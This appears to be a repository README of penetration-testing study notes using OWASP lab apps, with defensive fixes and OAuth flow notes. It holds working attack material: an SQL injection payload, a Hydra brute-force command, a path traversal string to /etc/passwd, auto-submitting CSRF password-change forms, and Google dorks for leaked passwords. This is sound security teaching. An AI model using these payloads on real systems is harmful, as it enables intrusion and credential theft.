Security Vulnerabilities, Angular Security App, Penetration Testing Tools and Configs; Secure Web Apps


bitaemi/securing-web-apps


Security Projects - covered subjects:

Hacking Web Apps and Penetration Testing (in short)

Hacking Web Apps and Penetration Testing - Tools & Configs

  • Install VirtualBox and Vagrant. Connect all your virtual machines in a NAT network.
  • Install Kali.
  • Install FoxyProxy in the browser and use it to switch the proxy for your browser traffic quickly each time you perform penetration tests.

In the terminal: each time you take action to troubleshoot issues (e.g. manually set the IP for your VM) you have to reboot your virtual machine.

```bash
ip a            # OR:
ifconfig        # to see your IP
ping 8.8.8.8    # ping your DNS address to check connectivity
# IP Address = Gateway IP
service networking restart
service networking status
```
  • choose proxy 'localhost:8080' in order to route traffic through Burp Suite
  • Use Burp Suite - run it by turning on interception
  • Use OWASP ZAP - you can use it as a personal proxy to find vulnerabilities in a web app:

```bash
chmod 755 ZAP_unix.sh
./ZAP_unix.sh   # install on the Linux VM
```

  • Use BeEF = Browser Exploitation Framework
  • Use OWASP's Broken Web Applications (available on sourceforge.net) in order to install it on your local machines and practise penetration testing

Inputs and Outputs testing

  • If the input is not sanitized, an SQL injection can be done by sending an input field value like:

```sql
1' OR 1=1 --
```

which completes a valid SQL statement in the database query process.

  • Use sqlmap (embedded in Kali Linux) to test and exploit SQL injection vulnerabilities.

  • A good fix for SQL injection is the use of an ORM (in object-oriented languages). On the front-end side, frameworks sanitize form inputs.

  • In the case of brute force attacks, the time needed to guess a password increases exponentially with its length. Advice for personal passwords: choose long passwords - e.g. 40-60 characters - for all your accounts, and for each account use a specific word that differs from one account to another.

Authentication vulnerabilities testing

  • Use Hydra (embedded in Kali) - an online application password cracking tool.

  • choose proxy 'localhost:8080' in order to route the browser's traffic through Burp Suite

  • make a login attempt; Burp intercepts this login attempt. Use Burp's data in order to crack the passwords with Hydra:

```bash
# as root@kali:
hydra -l admin -P /usr/share/john/password.lst 172.16.99.139 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -f
# where 'Login failed' is the failure message shown by the UI
# the -f flag makes the command exit as soon as it finds a valid user-password pair
```

Authorization vulnerabilities testing

  • One authorization vulnerability is path traversal (at the server level we can change the path and get direct access to files on the server).

For example, in the URL of the website being tested you can end the path with `../../../../../../etc/passwd` (for a Linux-based OS; on Windows the equivalent is `..\`), repeating `../` as many times as needed to reach the root path (if there are too many occurrences of `../` there will be no error, because the path cannot climb above the root). Thus you reach the passwd file. Worse, if the shadow file can be reached, we get access to the file with the actual passwords in encrypted form.
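A server-side guard against the traversal described above, as an added example (not code from this repository): the requested path is canonicalized with `os.path.realpath`, which collapses every `../` and follows symlinks, and is then checked against the web root; `resolve_under_base` and `is_safe_request` are names chosen here, and a POSIX file system is assumed.

```python
import os
from typing import Optional

def resolve_under_base(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path of user_path inside base_dir, or None if it escapes.

    The decision is made on the canonical path, not on the raw input, so
    '..', repeated separators and symlinks are all resolved first. Extra
    '../' segments above the root are simply dropped, which is why the page
    observes no error from too many of them; the check still rejects the path.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath rather than startswith: '/srv/www' must not accept '/srv/www2'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def is_safe_request(base_dir: str, user_path: str) -> bool:
    return resolve_under_base(base_dir, user_path) is not None

if __name__ == "__main__":
    # Constructed sample requests against a hypothetical web root /srv/www.
    for p in ["images/logo.png", "../../../../../../etc/passwd", "/etc/shadow", "a/../../x"]:
        print(f"{p!r:35} -> {resolve_under_base('/srv/www', p)}")
```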

Session management flaws - Session Fixation

The session ID should change after user login, otherwise a session fixation vulnerability can be exploited:

To test this vulnerability, in OWASP's Broken Web Applications installed on your Kali machine, click the OWASP WebGoat link. Authenticate and go to the session fixation vulnerability. Send a phishing email containing a made-up session id (which you - the attacker - will use after the victim has logged in with your made-up session id and its credentials) inside a legitimate-looking URL that points to the app the user trusts. Follow all the steps, guided by the OWASP WebGoat interface, in order to explore how the penetration test is done.
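The fix the section calls for, as an added example that is not WebGoat's or this repository's code: a minimal server-side session store that never adopts a session id it did not issue and that regenerates the id at login, so an id planted through a link is worthless after the victim authenticates. `SessionStore` and its methods are names chosen for this example.

```python
import secrets
from typing import Optional

class SessionStore:
    """Minimal server-side session store (constructed example)."""

    def __init__(self) -> None:
        self._sessions: dict = {}   # session id -> session data

    def _new_id(self) -> str:
        return secrets.token_urlsafe(32)   # unguessable, server-generated

    def get_or_create(self, presented_id: Optional[str]) -> str:
        # Only ids this server issued are accepted; an id smuggled in via a
        # link or a cookie set by a third party is ignored and replaced.
        if presented_id in self._sessions:
            return presented_id
        new_id = self._new_id()
        self._sessions[new_id] = {"user": None}
        return new_id

    def login(self, session_id: str, user: str) -> str:
        # Rotate the id at the privilege change: whoever knew the pre-login id
        # (the attacker who planted it) is left holding a dead session.
        data = self._sessions.pop(session_id, {"user": None})
        data["user"] = user
        new_id = self._new_id()
        self._sessions[new_id] = data
        return new_id

    def user_for(self, session_id: str) -> Optional[str]:
        return self._sessions.get(session_id, {}).get("user")

if __name__ == "__main__":
    store = SessionStore()
    planted = store.get_or_create(None)          # attacker obtains a real anonymous id
    after = store.login(planted, "victim")       # victim logs in using the planted id
    print(store.user_for(planted), store.user_for(after))   # None victim
```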

Session management flaws - Cross Site Request Forgery

Once again, you can test this vulnerability on OWASP's Broken Web Applications installed on your Kali machine:

  1. Click the CSRF button and then copy the change-password form from the page source into a page of your own:

```html
<h3>Just click the button</h3>
<form action="http://owaspbwa.com/dvwa/vulnerabilities/csrf" method="GET"> <!-- explicitly set the action URL of the GET method to the URL of the page where the form exists -->
<input type="hidden" name="password_new" value="111"> <!-- hide the new password input from the victim -->
<input type="hidden" name="password_conf" value="111"> <!-- hide the password confirmation input from the victim -->
<input type="submit" value="Change" name="Change">
</form>
```

While the user is logged in to the app (or you, testing this vulnerability), if he clicks the Change button on the page that loads this form (the one provided by an attacker who knows about the CSRF vulnerability), his password will be changed.

Even more, with some JavaScript the HTML doesn't even require the user to click:

```html
<h3>No need to click - no button</h3>
<form action="http://owaspbwa.com/dvwa/vulnerabilities/csrf" method="GET" name="myForm" id="myForm"> <!-- explicitly set the action URL of the GET method to the URL of the page where the form exists -->
<input type="hidden" name="password_new" value="111"> <!-- hide the new password input from the victim -->
<input type="hidden" name="password_conf" value="111"> <!-- hide the password confirmation input from the victim -->
<input type="hidden" value="Change" name="Change"> <!-- hide the button from the victim; the script submits the form -->
</form>
<script>
document.forms["myForm"].submit();
</script>
```
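What the password-change endpoint should do so that both forged pages above fail, as an added example (not DVWA's or this repository's code): refuse state changes over GET, and require a per-session synchronizer token that an attacker-hosted page cannot read. `issue_csrf_token` and `handle_change_password` are names chosen for this example; the session is modelled as a dict.

```python
import hmac
import secrets
from typing import Tuple

def issue_csrf_token(session: dict) -> str:
    # Generated once per session and embedded as a hidden field in the real form.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def handle_change_password(session: dict, method: str, form: dict) -> Tuple[int, str]:
    """Server-side handler for the password change endpoint; returns (HTTP status, message)."""
    # 1. State-changing actions only over POST: the attacker's GET form is refused.
    if method != "POST":
        return 405, "method not allowed"
    # 2. The request must carry the token issued to this session. The forged
    #    page sends only password_new/password_conf/Change, so it has no token,
    #    and the comparison is constant-time to avoid a timing leak.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    if not form.get("password_new") or form.get("password_new") != form.get("password_conf"):
        return 400, "passwords do not match"
    session["password"] = form["password_new"]   # stand-in for the real update
    return 200, "password changed"

if __name__ == "__main__":
    session = {"user": "victim"}
    forged = {"password_new": "111", "password_conf": "111", "Change": "Change"}
    print(handle_change_password(session, "GET", forged))     # (405, ...)
    print(handle_change_password(session, "POST", forged))    # (403, ...)
    forged["csrf_token"] = issue_csrf_token(session)          # only the real page can do this
    print(handle_change_password(session, "POST", forged))    # (200, 'password changed')
```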

Information Gathering Through the Internet

Google Hacking: looking for sensitive pages

  • inurl:co.uk inurl:admin # use this in Google search in order to find administrator panels on sites under the .co.uk domain
  • filetype:sql hotmail gmail password
  • site:/com:8443
  • intitle:index.of

Google Hacking Database - crawls the WWW

https://www.exploit-db.com/google-hacking-database

The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening reach of the Google search engine. In the GHDB you'll find search terms for files containing usernames, vulnerable servers, and even files containing passwords.

When the Google Hacking Database was integrated into Offensive Security's Exploit Database, the various Google dorks contained in the thousands of exploit entries were entered into the GHDB. The direct mapping allows penetration testers to determine more rapidly whether a particular web application has a publicly available exploit.

Shodan - crawls the Internet

Shodan crawls the Internet (https://ics-radar.shodan.io/) and finds all devices connected to the internet. Go to the www.shodan.io page. Search example: cisco last-modified country:GB . In the search results you will get access to Cisco interfaces where an attacker can perform brute force attacks - or even worse (for the victim), get access to a Cisco device manager interface.

pipl.com, checkusernames.com - gather info about people

pipl.com - gathers info about people that other search engines miss. checkusernames.com - searches 160 networks for a user name.

Web Archives

Web Archives - http://web.archive.org - stores pages that no longer exist on publicly available websites. Search for the website you are interested in and you will be provided with links (inside a timeline) to the archived website (which can contain sensitive data that is no longer disclosed on the live website).

FOCA - Fingerprinting Organization with Collected Archives

FOCA - Fingerprinting Organization with Collected Archives - a tool used mainly to find metadata and hidden information in documents.

a) You can download all the sources as well as the executable binary from github.com/ElevenPaths/FOCA (requires SQL Express installed on your machine), OR b) use an older, portable version - no installation - from elevenpaths.com's website (at the bottom of the page). Run FOCA.exe from the bin dir -> New Project, in which you correctly provide the website domain you want to scan and collect documents/metadata from. After the scan you will have the result list with documents; to see the metadata of each document, select the documents and download them.

The Harvester and Recon-NG

theHarvester (available at github.com/laramies/theHarvester and also embedded in Kali Linux) = a tool to gather emails, hosts, ports, etc. from a domain

```bash
theharvester options   # see options
theharvester -d etu.edu.tr -l 2000 -b bing   # domain etu.edu.tr, limit 2000 results, data source = bing
# when it finishes the search you will see the emails and hosts found as search results
```

Recon-ng - embedded in Kali Linux, or you can download it from bitbucket.org

Recon-ng is a full-featured web-based open source reconnaissance framework written in Python, complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion.

```bash
./recon-ng.py   # written in Python
recon-ng        # run the script and you will get a shell-like interface
help
show modules    # see available modules
use recon/domains-vulnerabilities/xssed
show info       # displays info about the recon/domains-vulnerabilities/xssed module
show options    # see the module's parameters
set SOURCE www.nhs.uk   # set the source in which to look for an xssed vulnerability
run             # run the module = search for vulnerabilities
```

Maltego - Visual Link Analysis Tool

Maltego website: www.paterva.com

```bash
maltegoce   # run the embedded Maltego Community Edition
```
  • Choose the machine to run
  • specify the target domain
  • 12 entries of data collected for this domain are shown on the result page
  • select grouped nodes in the graph results and you will see all the values (e.g. the emails for those nodes)

Authorization Code Flow Demo with HTTP in VS Code

https://www.youtube.com/watch?v=ly5dxX5z_ok&list=PLhOe7XHlsIfFXCnP7_4pDGlcyJ5l3GUqY&index=9

Code is in the dir ./Autentication-Flows-Http\get.http. Install the REST Client extension in order to make GET/POST API requests without the need for Postman. In VS Code -> View -> Toggle Word Wrap.

This basically includes authenticating with an ID token and after that getting the authorization token (access token) to authenticate in B2C. For dev purposes we use localhost, but the redirect URI should be https. get1.http:

```http
GET https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?client_id=andHeareIsTheValueFromAzureActiveDirectory..
&response_type=code
&redirect_uri=http://localhost
&response_mode=query
&scope=https://graph.microsoft.com/user.read
```

Instead of /organizations/ you can use /common/ or the tenant id, which you can find in portal.azure.com -> your registered app config.

If we run the GET request in VS Code, we get a 200 OK and the HTML page of the MS sign-in. Thus, if you put that URL in the browser you land on the MS login page, where, if you consent and log in, you get redirected to localhost with a query string like ?code=0.AAGGGFSGHH....&session_state=hhdgjg-gfgs... :

```
http://localhost/?code=theCodeThatIReceivedInTheQuesryParamsOfTheRedirectURL&session_state=hhdgjg-gfgs...
```

We use this code when we go to get our token:

```http
POST https://login.microsoftonline.com/organizations/oauth2/v2.0/token
Content-Type: application/x-www-form-urlencoded

client_id=andHeareIsTheValueFromAzureActiveDirectory
&redirect_uri=http://localhost
&scope=https://graph.microsoft.com/user.read
&grant_type=authorization_code
&code=theCodeThatIReceivedInTheQuesryParamsOfTheRedirectURL
```

If I run this POST I get the bearer token that I can further use to access the different APIs. aka.ms/ge opens https://developer.microsoft.com/en-us/graph/graph-explorer

To get the profile photo use the https://graph.microsoft.com/v1.0/me/photo/$value API:

```http
GET https://graph.microsoft.com/v1.0/me/photo/$value
Authorization: Bearer theBearerTokenthatIcanfurtherusetoaccessdiferentAPIs
```

OAuth 2.0 authorization code flow (with PKCE). The authorization code flow allows the application to exchange an authorization code for ID tokens that represent the authenticated user and access tokens needed to call protected APIs. In addition, it returns refresh tokens that provide long-term access to resources on behalf of users without requiring interaction with those users. This is the recommended approach.

https://docs.microsoft.com/en-us/azure/active-directory/develop/authentication-flows-app-scenarios
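The two requests above with PKCE added, as an added example that is not code from this repository or from Microsoft: a client generates a random `code_verifier`, sends its SHA-256 `code_challenge` on the authorize request, and returns the verifier on the token request so that an intercepted code alone cannot be redeemed. Assumptions: the /organizations/ authority from the text, the client id and code shown as placeholders, and the `state` parameter being checked by the caller on the redirect.

```python
import base64
import hashlib
import secrets
from urllib.parse import urlencode

AUTHORITY = "https://login.microsoftonline.com/organizations/oauth2/v2.0"

def b64url(data: bytes) -> str:
    # Base64url without '=' padding, as RFC 7636 requires.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def new_code_verifier() -> str:
    # 32 random bytes -> 43 characters, inside the 43..128 range allowed by the RFC.
    return b64url(secrets.token_bytes(32))

def code_challenge(verifier: str) -> str:
    # S256 method: challenge = BASE64URL(SHA256(ASCII(verifier)))
    return b64url(hashlib.sha256(verifier.encode("ascii")).digest())

def build_authorize_url(client_id: str, redirect_uri: str, scope: str,
                        verifier: str, state: str) -> str:
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": scope,
        "state": state,                     # echoed back; the caller compares it on the redirect
        "code_challenge": code_challenge(verifier),
        "code_challenge_method": "S256",
    }
    return f"{AUTHORITY}/authorize?{urlencode(params)}"

def build_token_body(client_id: str, redirect_uri: str, scope: str,
                     code: str, verifier: str) -> str:
    # Body for POST {AUTHORITY}/token with Content-Type: application/x-www-form-urlencoded.
    # Only the party that generated the verifier can satisfy the challenge it sent earlier.
    return urlencode({
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": scope,
        "grant_type": "authorization_code",
        "code": code,
        "code_verifier": verifier,
    })

if __name__ == "__main__":
    v = new_code_verifier()   # keep this in the client until the token request
    print(build_authorize_url("CLIENT_ID_PLACEHOLDER", "http://localhost",
                              "https://graph.microsoft.com/user.read", v, secrets.token_urlsafe(16)))
    print(build_token_body("CLIENT_ID_PLACEHOLDER", "http://localhost",
                           "https://graph.microsoft.com/user.read", "CODE_PLACEHOLDER", v))
```

The test vector from RFC 7636 Appendix B (verifier `dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk`, challenge `E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM`) can be used to check `code_challenge`.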

More Secure JavaScript Single-Page Applications with MSAL 2.0 and OAuth 2.0 Auth Code Flow with PKCE

You can follow MS Azure Active Directory docs, videos and posts about configuring your app registrations. You will find details about all the above.

How to authenticate users of your app with MS identity platform

Security Architecture Using Claims

Diagram: angular-security-using-claims
